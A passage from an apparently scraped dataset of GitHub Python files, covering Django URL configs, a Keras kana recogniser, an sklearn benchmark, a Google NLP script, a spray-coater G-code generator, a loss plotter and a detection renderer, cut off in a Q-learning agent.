rest_framework.authtoken.views import obtain_auth_token\n\nfrom . import views\n\nurlpatterns = [\n path('', views.home_view, name='home_view'),\n path('api-token-auth', obtain_auth_token, name='api_token_auth'),\n path('create', views.create_broad_topic, name='create_broad_topic'),\n path('delete', views.delete_broad_topic, name='delete_broad_topic'),\n path('create-subtopic', views.create_subtopic, name='create-subtopic'),\n path('create-item', views.create_item, name='create-item'),\n path('delete-subtopic', views.delete_subtopic, name='delete-subtopic'),\n path('delete-item', views.delete_item, name='delete-item'),\n path('update-item', views.update_item, name='update-item'),\n path('update-subtopic', views.update_subtopic, name='update-subtopic'),\n path('update-topic', views.update_broad_topic, name='update-broad-topic'),\n path('update-item-priorities', views.update_item_priorities, name='update-item-priorities'),\n path('login', views.login_user, name='login'),\n path('register', views.register, name='register'),\n path('logout', views.logout_view, name='logout')\n]","repo_name":"skbhagat40/To-Do-List-FulllStack-Django","sub_path":"trello_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23950628325","text":"# coding:utf-8\nimport cv2\nimport keras\nimport numpy as np\nimport collections\nfrom PIL import ImageFont, ImageDraw, Image\nfrom keras.models import model_from_json#load_model\nfrom keras.preprocessing.image import array_to_img, img_to_array,load_img\nimport os\nimport re\n\nlabel_dict = {\"0\":\"あ\", \"1\":\"い\", \"2\":\"う\", \"3\":\"え\", \"4\":\"お\", \"5\":\"か\", \"6\":\"き\", \"7\":\"く\", \"8\":\"け\", \"9\":\"こ\", \"10\":\"さ\", \"11\":\"し\", \"12\":\"す\", \"13\":\"せ\", \"14\":\"そ\", \"15\":\"た\", \"16\":\"ち\", \"17\":\"つ\", \"18\":\"て\", \"19\":\"と\", \"20\":\"な\", \"21\":\"に\", \"22\":\"ぬ\", \"23\":\"ね\", \"24\":\"の\", \"25\":\"は\", \"26\":\"ひ\", \"27\":\"ふ\", \"28\":\"へ\", \"29\":\"ほ\", \"30\":\"ま\", \"31\":\"み\", \"32\":\"む\", \"33\":\"め\", \"34\":\"も\", \"35\":\"や\", \"36\":\"ゆ\", \"37\":\"よ\", \"38\":\"ら\", \"39\":\"り\", \"40\":\"る\", \"41\":\"れ\", \"42\":\"ろ\", \"43\":\"わ\", \"44\":\"ゐ\", \"45\":\"ゑ\", \"46\":\"を\", \"47\":\"ん\", \"48\":\"ゝ\", \"49\":\"-\"}\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\"\n\nmodel =model_from_json(open(\"model/k_mnist_cnn_model.json\").read())\nmodel.load_weights(\"model/k_mnist_cnn_weights.h5\")\n\ndef remake(frame):\n threshold = 100\n ret, frame= cv2.threshold(frame, threshold, 255, cv2.THRESH_BINARY)\n frame=cv2.bitwise_not(frame)\n img=cv2.resize(frame[150:350,200:400],(28,28))\n return img\n\ndef check_number(frame):\n X = []\n img = img_to_array(frame)\n X.append(img)\n X = np.asarray(X)\n X = X.astype(\"float32\")\n X = X / 255.0\n num=model.predict(X)\n ans=str(num.argmax())\n return ans\n\ndef img_add_msg(img, message):\n font_path = 'C:\\Windows\\Fonts\\meiryo.ttc' # Windowsのフォントファイルへのパス\n font_size = 24 # フォントサイズ\n font = ImageFont.truetype(font_path, font_size) # PILでフォントを定義\n img = Image.fromarray(img) # cv2(NumPy)型の画像をPIL型に変換\n draw = ImageDraw.Draw(img) # 描画用のDraw関数を用意\n # テキストを描画(位置、文章、フォント、文字色(BGR+α)を指定)\n draw.text((20, 50), message, font=font, fill=(255, 0, 0, 0))\n img = np.array(img) # PIL型の画像をcv2(NumPy)型に変換\n return img\n\ndef main():\n cap = cv2.VideoCapture(0)\n ans = []\n text = \"49\"\n while(cap.isOpened()):\n ret,frame=cap.read()\n frame1=frame\n frame = cv2.cvtColor(cap.read()[1], cv2.COLOR_RGB2GRAY)\n img=remake(frame)\n ansnum=check_number(img)\n ans.append(ansnum)\n if (len(ans)>10):\n c = collections.Counter(ans)\n text = c.most_common()[0][0]\n ans.clear()\n tex=label_dict[text]\n\n frame1 = img_add_msg(frame1, tex)\n cv2.imshow(\"num\", frame1)\n\n key = cv2.waitKey(10)\n if key == 27:\n #escキー\n cv2.destroyAllWindows()\n break\n cap.release()\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"andoureo/deeplernning","sub_path":"kmnist.py","file_name":"kmnist.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71543147309","text":"import first_approach as fa\nimport second_approach as sa\n\n\nfrom sklearn.linear_model import RidgeClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.naive_bayes import BernoulliNB, ComplementNB, MultinomialNB, GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import NearestCentroid\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.utils.extmath import density\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn import metrics\n\n\nfrom time import time\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n## Return the evental classifying differences between \n## two result arrays\n\ndef compare_lists(l1,l2):\n l = []\n for i in range(len(l1)):\n if(l1[i] != l2[i]):\n l.append((i,l1[i],l2[i]))\n return l\n\n\n## Measures the performances of a certain approach with the selected model\n\ndef benchmark(clf,Approach=1,vect_type=\"hash\"):\n print('_' * 80)\n print(\"Training: \")\n print(clf)\n clf_trained = None\n score = 0\n t0 = time()\n if Approach == 1:\n clf_trained,score,vectorizer = fa.train_and_test_model(clf,vect_type=\"hash\")\n elif Approach == 2:\n clf_trained,score = sa.train_and_test_model(clf)\n else:\n raise RuntimeError(\"Only two approaches known : Bucket of Words[1] or Manual Graph Analysis[2]\")\n train_time = time() - t0\n print(\"train and test time: %0.3fs\" % train_time)\n\n t0 = time()\n if Approach == 1:\n fa.evaluate_mystery_set(clf_trained,vect=vectorizer)\n elif Approach == 2:\n sa.evaluate_mystery_set(clf_trained)\n \n test_time = time() - t0\n print(\"test with mystery dataset time: %0.3fs\" % test_time)\n\n print(\"accuracy: %0.3f\" % score)\n print()\n clf_descr = str(clf).split('(')[0]\n return clf_descr, score, train_time, test_time\n\n\n## Generates the output on a .txt file of the test on blind-dataset by using\n## two approaches with the selected models\n\ndef output_to_file(clf1=None,v_type=\"hash\",clf2=None,output=True,diff=True):\n \n print()\n print(\"##################################\")\n print(\"######## First Approach ########\")\n print(\"##################################\")\n print()\n\n if clf1 is None:\n clf_trained1,_,vect = fa.train_and_test_model(vect_type=v_type,verbose=True)\n else:\n clf_trained1,_,vect = fa.train_and_test_model(clf1,vect_type=v_type,verbose=True)\n print()\n print(\"##################################\")\n print(\"######## Second Approach ########\")\n print(\"##################################\")\n print()\n\n if clf2 is None:\n clf_trained2,_ = sa.train_and_test_model(verbose=True)\n else:\n clf_trained2,_ = sa.train_and_test_model(clf2,verbose=True)\n y1=fa.evaluate_mystery_set(clf_trained1,vect=vect)\n y2=sa.evaluate_mystery_set(clf_trained2)\n if diff:\n assert len(y1) == len(y2)\n diff = compare_lists(y1,y2)\n print(\"Over \"+str(len(y1))+\" occurrences:\")\n print(\"Number of Differences \" + str(len(diff)))\n perc = (len(diff)/len(y1)) * 100\n print(\"Percentage of Differences %0.3f%%\" % perc )\n if output:\n title1 = \"results1_\"+v_type+\".txt\"\n f = open(title1, \"w\")\n for element in y1:\n f.write(element+'\\n')\n f.close()\n f = open(\"results2.txt\", \"w\")\n for element in y2:\n f.write(element+'\\n')\n f.close()\n\n## Measures the performances of a certain approach with different models\n\ndef test_approach(Appr=1,vect_t=\"none\"):\n results = []\n for clf, name in (\n (RidgeClassifier(tol=1e-2, solver=\"auto\"), \"Ridge Classifier\"),\n (PassiveAggressiveClassifier(max_iter=50),\n \"Passive-Aggressive\"),\n (KNeighborsClassifier(n_neighbors=10), \"kNN\"),\n (RandomForestClassifier(), \"Random forest\"),\n (LinearSVC(),\"Linear SVC\"),\n (DecisionTreeClassifier(),\"Desition Tree\"),\n (MultinomialNB(alpha=.01),\"MultinomialNB\"),\n (BernoulliNB(alpha=.01),\"BernoulliNB\"),\n (ComplementNB(alpha=.1),\"ComplementNB\")\n ):\n # Naive Byes won't work with negative values\n if name in [\"BernoulliNB\",\"MultinomialNB\",\"ComplementNB\"] and vect_t in [\"hash\",\"tfid\",\"count\"]:\n continue\n print('=' * 80)\n print(name)\n print()\n print(\"Approach: \"+str(Appr)+\", Vectorizer Transform: \"+vect_t)\n results.append(benchmark(clf,Approach=Appr,vect_type=vect_t))\n print('=' * 80)\n indices = np.arange(len(results))\n return results,indices\n\n## Plot the results of the benchmark\n\ndef plot_results(results,indices,title=None):\n results = [[x[i] for x in results] for i in range(4)]\n\n clf_names, score, training_time, test_time = results\n training_time = np.array(training_time) / np.max(training_time)\n test_time = np.array(test_time) / np.max(test_time)\n\n plt.figure(figsize=(12, 8))\n if title is None:\n plt.title(\"Score\")\n else:\n plt.title(title)\n plt.barh(indices, score, .2, label=\"score\", color='navy')\n plt.barh(indices + .3, training_time, .2, label=\"training time\",\n color='c')\n plt.barh(indices + .6, test_time, .2, label=\"test time\", color='darkorange')\n plt.yticks(())\n plt.legend(loc='best')\n plt.subplots_adjust(left=.25)\n plt.subplots_adjust(top=.95)\n plt.subplots_adjust(bottom=.05)\n\n for i, c in zip(indices, clf_names):\n plt.text(-.3, i, c)\n plt.show()\ndef best_in_results(results):\n max_ = 0\n clf = \"\"\n for clf_descr,accuracy, _, _ in results:\n if accuracy > max_:\n max_ = accuracy\n clf = clf_descr\n return max_,clf \n\n#output_to_file(clf1=PassiveAggressiveClassifier(),v_type=\"tfid\",clf2=RandomForestClassifier())\n\n\nresults1h,indices1h=test_approach(Appr=1,vect_t=\"hash\")\nmax_1h,clf1h=best_in_results(results1h)\n\nresults1c,indices1c=test_approach(Appr=1,vect_t=\"count\")\nmax_1c,clf1c=best_in_results(results1c)\n\nresults1r,indices1r=test_approach(Appr=1,vect_t=\"tfid\")\nmax_1r,clf1r=best_in_results(results1r)\n\n\nresults2,indices2=test_approach(Appr=2,vect_t=\"none\")\nmax_2,clf2=best_in_results(results2)\n\nprint(\"Best in categories:\")\nprint()\nprint(max_1h,clf1h)\nprint(max_1c,clf1c)\nprint(max_1r,clf1r)\n\nprint(max_2,clf2)\n\nplot_results(results1h,indices1h,title=\"1st Approach with Hash Vectorizer\")\nplot_results(results1c,indices1c,title=\"1st Approach with Count Vectorizer\")\nplot_results(results1r,indices1r,title=\"1st Approach with Tfid Vectorizer\")\n\nplot_results(results2,indices2,title=\"2nd Approach\")\n#Best in categories:\n#0.9846762234305487 PassiveAggressiveClassifier\n#0.9817103311913 PassiveAggressiveClassifier\n#0.9831932773109243 PassiveAggressiveClassifier\n#0.9688581314878892 RandomForestClassifier\n","repo_name":"IlKaiser/ML-H1","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11882895752","text":"from google.cloud import language_v1\nfrom google.cloud.language_v1 import enums\nfrom google.cloud import translate_v3beta1 as translate\nfrom nlp import nlp\n\ndef test_language_sentiment(input_file, client):\n with open('lang_sent.txt', 'w') as output_file:\n for line in input_file:\n line = line.strip(\"RT\").strip()\n review = nlp(line)\n review.analyze_sentiment(client) \n output = review.language + ',' + str(review.sentiment) + '\\n'\n print(output)\n output_file.write(output)\n\ndef test_entity_sent(input_file, client):\n with open('entities.csv', 'w') as output_file:\n for line in input_file:\n line = line.strip(\"RT\").strip()\n review = nlp(line)\n review.analyze_sentiment(client)\n # do entity analysis if only in 'en' \n if ((review.language) and (review.language == \"en\")):\n print(review)\n print(review.language)\n review.analyze_entity_sentiment(client)\n for entity in review.entities:\n output = entity.name + '\\n'\n print(output)\n output_file.write(output)\n print(review)\n\n\n# nlp client\nnlp_client = language_v1.LanguageServiceClient()\n\ninput_file = open('sample_reviews.csv', 'r')\ntest_entity_sent(input_file, nlp_client)\ninput_file.close()\n","repo_name":"roshan2M/jet-blue-analysis","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22857027655","text":"spray_distance = float(\"5\")\nspray_hight = 60\nspray_speed = 180\nspray_flow = 0.2\nspray_cycles = 2\nspray_delay = 1\nspray_solution = 4\n\n\nfilename = \"C:/Users/stoecma2/Desktop/test.gcode\"\n\t\nfile = open(filename, \"w\")\nfile.write( \";Spray file generated on the fly\\n\")\n\nif 1:\n\t###################section start###################\n\t# position constants\n\tsp_home_x = 0.0\n\tsp_home_y = 0.0\n\tsp_home_z = 0.0\n\tsp_offset = 0.0\n\tsp_x1 = -60.0\n\tsp_x2 = 60.0\n\tsp_y1 = -80.0\n\tsp_y2 = 80.0\n\tsp_top = 100.0\n\tsp_wash_x = 0.0\n\tsp_wash_y = -110.0\n\tsp_wash_z = -50.0\n\t# wash position top, use to approach\n\tsp_wash_u = -30.0\n\n\t# commands\n\tsc_valve_wash = \"G1 V2 F200\\nG4 S1\\n\"\n\tsc_valve_spray = \"G1 V1 F200\\nG4 S1\\n\"\n\tsc_valve_waste = \"G1 V0 F200\\nG4 S1\\n\"\n\t#go to valve position % nr\n\tsc_valve_pos = \"G1 V{} F200\\nG4 S1\\n\"\n\tsc_air_on = \"M106\\n\"\n\tsc_air_off = \"M106 S0\\n\"\n\tsc_init = \"G28XYZ\\nG28P\\n\"\n\tsc_motor_off = \"M18\\n\"\n\n\t# go to wash position\n\tsc_go_to_wash = \";go to wash\\nG1 X{} Y{} Z{} F200\\nG1 Z{}\\n\".format (sp_wash_x, sp_wash_y, sp_wash_u, sp_wash_z)\n\n\t# aspirate % position\n\tsc_aspirate = \"G1 P{} F200\\n\"\n\n\t# set syringe to absolute mode\n\tsc_syringe_absolute= \"M82\\n\"\n\n\t# set syringe to realtive mode\n\tsc_syringe_relative = \"M83\\n\"\n\n\t# empty syringe\n\tsc_empty = \"G1 P0 F200\\n\"\n\n\t# wait % seconds\n\tsc_wait = \"G4 S{}\\n\"\n\n\t# set speed % speed\n\tsc_speed = \"G1 F{}\\n\"\n\n\t# go to syringe position % position\n\tsc_syringe_position = \"G1 P{}\\n\"\n\n\t# move fast % x, y position\n\tsc_move_fast = \"G1 X{} Y{} F200\\n\"\n\n\t# move fast % z position\n\tsc_move_fast_z = \"G1 Z{} F200\\n\"\n\n\t# spray fast % x, y, p, f\n\tsc_spray = \"G1 X{} Y{} P{} F{}\\n\"\n\n\tsc_go_home = \"G1 X0 Y0 Z0 F200\\n\"\n\n\t# washing tip\n\t# a go to wash position\n\tsc_wash = \"; wash\\n\"\n\tsc_wash += sc_syringe_absolute\n\tsc_wash += sc_go_to_wash\n\t# spray rest to waste\n\tsc_wash += sc_air_on\n\tsc_wash += sc_valve_waste + sc_empty\n\t# clean syringe with wash solution\n\tsc_wash += sc_valve_wash + sc_aspirate.format(10)\n\tsc_wash += sc_valve_waste + sc_empty\n\t# clean spray with wash solution\n\tsc_wash += sc_valve_wash + sc_aspirate.format(4)\n\tsc_wash += sc_valve_spray + sc_speed.format(0.5) + sc_syringe_position.format(0)\n\t# drip wash solution from spray\n\tsc_wash += sc_air_off\n\tsc_wash += sc_valve_wash + sc_aspirate.format(3)\n\tsc_wash += sc_valve_spray + sc_speed.format(0.2) + sc_syringe_position.format(0)\n\tsc_wash += sc_syringe_position.format(1)\n\tsc_wash += sc_air_on\n\tsc_wash += sc_syringe_position.format(0)\n\n\t# priming system\n\tsc_prime =\"; prime\\n\" + sc_init\n\tsc_prime += sc_syringe_absolute\n\tsc_prime += sc_valve_wash + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\tsc_prime += sc_valve_pos.format(3) + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\tsc_prime += sc_valve_pos.format(4) + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\tsc_prime += sc_valve_pos.format(5) + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\tsc_prime += sc_valve_wash + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\n\t# purge system\n\tsc_purge =\"; purge\\n\" + sc_init\n\tsc_purge += sc_syringe_absolute\n\tsc_purge += sc_valve_wash + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\tsc_purge += sc_valve_wash + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\tsc_purge += sc_valve_wash + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\n\n\t# dry spray\n\tsc_wash += sc_air_on + \"G4 S2\\nG4 S2\\nG4 S2\\nG4 S2\\n\" + sc_air_off\n\n\t#coating starts\n\tfile.write(\";start coating\\n\")\n\tfile.write(sc_init)\n\n\t#syringe parameter in ul/mm\n\tspray_syringe_volume_per_travel = 29\n\t\n\t#flow contains ul/cm^2\n\t#densitity in ul/mm\n\tspray_density = float(spray_flow)/100 * spray_distance\n\n\tspray_lines = int((sp_y2 - sp_y1)/spray_distance)\n\tspray_travel_distance = spray_lines * (sp_x2 - sp_x1) + (sp_y2 - sp_y1)\n\tspray_time = spray_travel_distance / spray_speed\n\n\tspray_syringe_volume = spray_travel_distance * spray_density\n\tspray_syringe_travel = spray_syringe_volume / spray_syringe_volume_per_travel\n\n\tspray_syringe_x = (sp_x2 - sp_x1) * spray_density / spray_syringe_volume_per_travel * -1\n\tspray_syringe_y = spray_distance * spray_density / spray_syringe_volume_per_travel * -1\n\t\n\t# this is an intrinsic factor, test\n\tspray_feed = spray_speed * 1.0\n\t\n\t#prime system\n\tfile.write(sc_go_to_wash)\n\tfile.write(sc_valve_pos.format(spray_solution))\n\tfile.write(sc_air_on)\n\t# prime spray with spray solution\n\tfile.write(sc_aspirate.format(2))\n\tfile.write(sc_valve_spray + sc_speed.format(0.5) + sc_syringe_position.format(0))\n\n\t#start loop\n\tfor n in range(spray_cycles):\n\t\t#aspirate syringe\n\t\tfile.write(sc_air_on)\n\t\tfile.write(sc_syringe_absolute)\n\t\tfile.write(sc_valve_pos.format(spray_solution))\n\t\tfile.write(sc_aspirate.format(spray_syringe_travel + 2))\n\t\tfile.write(sc_valve_spray)\t\t\n\t\tfile.write(sc_speed.format(0.5) + sc_syringe_position.format(spray_syringe_travel))\n\t\tfile.write(sc_move_fast_z.format(sp_wash_u))\n\n\t\t#move to start\n\t\ty_offset = spray_distance / spray_lines * n + sp_y1\n\t\tfile.write(sc_move_fast.format(sp_x1, y_offset))\n\t\tfile.write(sc_move_fast_z.format((spray_hight - sp_top)))\n\t\tfile.write(sc_syringe_relative)\n\t\t#spray cycle\n\t\tfor y in range(spray_lines):\n\t\t\tif y % 2 == 0:\n\t\t\t\t#even\n\t\t\t\tfile.write(sc_spray.format(sp_x2, y_offset, spray_syringe_y, spray_feed))\n\t\t\t\tfile.write(sc_spray.format(sp_x1, y_offset, spray_syringe_x, spray_feed))\n\t\t\telif y == 0:\n\t\t\t\t#first line\n\t\t\t\tfile.write(sc_spray.format(sp_x2, y_offset, spray_syringe_x, spray_feed))\n\t\t\telse:\n\t\t\t #odd line\n\t\t\t\tfile.write(sc_spray.format(sp_x1, y_offset, spray_syringe_y, spray_feed))\n\t\t\t\tfile.write(sc_spray.format(sp_x2, y_offset, spray_syringe_x, spray_feed))\n\n\t\t\ty_offset += spray_distance\n\n\t\t#move to wash\n\t\tfile.write(\"G1 Y{} Z{} F200\".format(sp_y1, sp_wash_u))\n\t\tfile.write(sc_go_to_wash)\n\n\t\t#empty syringe\n\t\tfile.write(sc_syringe_absolute)\n\t\tfile.write(sc_valve_waste + sc_empty)\n\t\t#back to start\n\n\t\t#clean syringe\n\n\t\tif n != int(spray_cycles):\n\t\t\tfile.write(sc_air_off)\n\t\t\tfile.write(sc_wait.format(spray_delay))\n\t# now do the wash\n\tfile.write(sc_air_off)\n\tfile.write(sc_wash)\n\tfile.write(sc_go_home)\n\tfile.write(sc_motor_off)\n\tfile.write(sc_prime)\n\tfile.write(sc_purge)\n\n\t###################section stop###################\n\nfile.close()","repo_name":"stoeckli/iMatrixSpray","sub_path":"octoprint/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":6152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19403923149","text":"#!/usr/bin/env python3\n\nimport matplotlib.pyplot as plt\nimport os.path as osp\nimport numpy as np\n\n\nimport sys\nimport time\nfrom typing import Tuple\n\ndef rolling_average(data : np.ndarray,\n windowsize : int,\n )-> np.ndarray:\n \"\"\"Compute rolling average\n\n Parameter:\n ---------\n data : np.ndarray\n data for which rolling average should be\n computed\n windowsize : int\n size of window to use upon compuation\n of rolling average. Should be odd number.\n Retruns:\n -------\n The rolling avarege\n values for the data array.\n\n \"\"\"\n\n tile = np.ones(windowsize) / windowsize\n smooth = np.convolve(data,\n tile,\n mode = 'valid',\n )\n\n return smooth\n\ndef get_loss_data(loss_file : str,\n )-> Tuple[np.ndarray]:\n \"\"\"Read loss values from file\n\n Parameter:\n ---------\n loss_file : str\n path to loss file\n Returns:\n -------\n Tuple with epoch number as first\n item and loss value as second\n\n\n \"\"\"\n # exit if loss file does not exist\n if not osp.exists(loss_file):\n print(' '.join([f\"ERROR : the file {loss_file}\",\n \"does not exist\",\n ]\n ),\n )\n sys.exit(-1)\n\n # read loss files\n with open(loss_file,\"r+\") as fopen:\n # remove initial and trailing commas\n loss_history = fopen.read().lstrip(',').rstrip(',')\n\n # convert loss history to array\n loss_history = np.array([float(x) for \\\n x in loss_history.split(',')])\n\n # generate epoch values\n epoch = np.arange(1,loss_history.shape[0]+1)\n\n return (epoch,\n loss_history)\n\ndef progress(loss_file : str,\n windowsize : int,\n )-> None:\n \"\"\"Dynamic plot of loss history\n\n Parameter:\n ---------\n loss_file : str\n path to loss history file\n windowsize : int\n size of window to use upon compuation\n of rolling average. Should be odd number.\n\n \"\"\"\n\n # make sure windowsize is int\n if not isinstance(windowsize,int):\n windowsize = int(windowsize)\n\n # if even windowsize value add one\n if windowsize % 2 == 0:\n windowsize += 1\n # length of array that is lost\n # in rolling average computation\n side = int((windowsize - 1) / 2)\n\n # create figure and axes\n fig, ax = plt.subplots(1,\n 1,\n figsize = (8,5),\n num = 13,\n )\n # line to represent loss values\n line1, = ax.plot([],\n [],\n linestyle = 'dashed',\n color = 'black',\n )\n # line to represent rolling average\n # values\n line2, = ax.plot([],\n [],\n color = 'blue',\n alpha = 0.2,\n linewidth = 5,\n )\n\n # customize plot\n ax.set_ylabel('Loss',\n fontsize = 25)\n ax.set_xlabel('Epoch',\n fontsize = 25)\n\n # remove spines\n for pos in ['top','right']:\n ax.spines[pos].set_visible(False)\n\n # update loss plot every 10th second\n keepOn = True\n while keepOn and plt.fignum_exists(13):\n try:\n # get loss data from file\n xdata,ydata = get_loss_data(loss_file)\n # compute rolling average\n ydata_smooth = rolling_average(ydata,\n windowsize = windowsize)\n\n # get limits for axes\n xmin,xmax = xdata.min() - 1, xdata.max() + 1\n ymin,ymax = ydata.min() - 1, ydata.max() + 1\n\n # update axes\n line1.set_xdata(xdata)\n line1.set_ydata(ydata)\n\n line2.set_xdata(xdata[side:-side])\n line2.set_ydata(ydata_smooth)\n\n ax.set_xlim([xmin,xmax])\n ax.set_ylim([ymin,ymax])\n\n # try except to catch interactive\n # closure (CTRL+W) of plot\n try:\n plt.pause(10)\n except:\n print(\"Closing visualization\")\n keepOn = False\n\n except KeyboardInterrupt:\n print(\"Closing visualization\")\n plt.close()\n keepOn = False\n\nif __name__ == '__main__':\n progress(sys.argv[1],\n sys.argv[2])\n","repo_name":"almaan/stereoscope","sub_path":"stsc/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"37"} +{"seq_id":"26205362185","text":"#import os\nimport time\nimport numpy as np\nimport cv2\nfrom freenect import sync_get_depth as get_depth, sync_get_video as get_video\nfrom numpy import asarray\nfrom PIL import Image as PImage\n\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport pyqtgraph as pg\n\nimport pickle\nimport subprocess\n\ntarget_fps = 10\nseconds_buffer = 10\nms_sleep = 1/target_fps\n\nif __name__ == \"__main__\":\n\n ##########################\n # Setup Qt-Window\n\n pg.setConfigOptions(antialias=True)\n application = QtGui.QApplication([])\n\n window = pg.GraphicsWindow()\n window.resize(1000,600)\n window.setWindowTitle(\"Quality Software.to detection visualizer\")\n container = pg.ImageItem()\n containerplot = window.addPlot()\n containerplot.addItem(container)\n\n ##########################\n # Start infinite loop\n # and write to inp_mode\n # 1 = kinect & 0 = webcam \n \n time_outcounter = 0\n frame_counter = -(seconds_buffer * target_fps)\n while True:\n time_start = time.time()\n window.setWindowTitle(\"Quality Software.to detection visualizer FRAME \" + str(frame_counter))\n cv2.waitKey(1) # find better (non-cv) solution for qt refreshing EDIT: no time -> just keep it\n\n if frame_counter > 0:\n try:\n # unpickle results and frame\n print(\"Grabbing frame #\" + str(frame_counter) + \"\\t\", end='', flush=True)\n cmd = ['wget', \"127.0.0.1:2438/getDetection?id=\" + str(frame_counter), \"-O\", \"/tmp/tta.frame.\" + str(frame_counter), \"wb+\"]\n prc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, input=\"\")\n\n\n print(\"\\rGrabbing frame #\" + str(frame_counter) + \" [ LOADING ]\\t\", end='', flush=True)\n with open(\"/tmp/tta.frame.\" + str(frame_counter), \"rb\") as handle:\n dataframe = pickle.load(handle)\n\n frame = dataframe[\"frame\"]\n results = dataframe[\"results\"]\n\n print(\"\\rGrabbing frame #\" + str(frame_counter) + \" [ RENDERING ]\\t\", end='', flush=True)\n # receive results (not here but somewhere):\n for cat, score, bounds in results:\n x, y, w, h = bounds\n cv2.rectangle(frame, (int(x-w/2),int(y-h/2)),(int(x+w/2),int(y+h/2)),(255,0,0))\n cv2.putText(frame, str(cat.decode(\"utf-8\")), (int(x), int(y)), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 0))\n p_image = PImage.fromarray(frame)\n p_image.save(\"rendered/\" + str(frame_counter) + \".jpg\", \"JPEG\")\n container.setImage(asarray(p_image.rotate(-90)))\n cv2.waitKey(1) # find better (non-cv) solution for qt refreshing EDIT: no time -> just keep it\n except:\n pass\n\n time_end = time.time()\n time_sleep = ms_sleep - (time_end - time_start)\n if time_sleep < 0:\n time_outcounter += 1\n if time_outcounter > 5:\n print(\"System cant keep up.\")\n #exit(1)\n else:\n time_outcounter = 0\n time.sleep(time_sleep)\n frame_counter += 1\n","repo_name":"StoneLabs/trackemall-level-1","sub_path":"renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36903398030","text":"\"\"\"server URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import include, path, re_path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom rest_framework import routers, permissions\nfrom django.conf import settings\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nfrom app.apps.posts.views import PostCommentView, PostDraftView, PostView\nfrom app.apps.core.views import GoogleLogin\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"News blog\",\n default_version='v1',\n description=\"News blog API endpoints\",\n contact=openapi.Contact(email=\"test@email.com\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny, ),\n)\n\nrouter = routers.DefaultRouter()\nrouter.register(r'posts', PostView)\nrouter.register(r'drafts', PostDraftView)\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path(\"api/v1/auth/\", include(\"dj_rest_auth.urls\")),\n path(\"api/v1/social-auth/google/\",\n GoogleLogin.as_view(), name=\"google_login\"),\n path(\"api/v1/posts//comments/\", PostCommentView.as_view({ 'get': 'list', 'post': 'create' }), name='comments'),\n path(\"api/v1/\", include(router.urls)),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n urlpatterns += [\n re_path(r'^api/v1/swagger(?P\\.json|\\.yaml)$',\n schema_view.without_ui(cache_timeout=0), name='schema-json'),\n re_path(r'^api/v1/swagger/$', schema_view.with_ui('swagger',\n cache_timeout=0), name='schema-swagger-ui'),\n ]\n","repo_name":"sodiqit/django-news-blog","sub_path":"server/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21955952983","text":"import numpy as np\n\nfrom .agent import Agent\n\n\nclass AvgMinQlearning(Agent):\n def __init__(self, env, beta=0.5, discount=0.9, learning_rate=0.01, epsilon=0.1):\n super().__init__(env, discount, learning_rate, epsilon)\n self.name = \"AvgMin\" + str(beta)\n self.beta = beta\n self.q = np.random.uniform(low=-1, high=1, size=(self.n_states, self.n_actions))\n self.old_values = np.random.uniform(\n low=-1, high=1, size=(self.n_states, 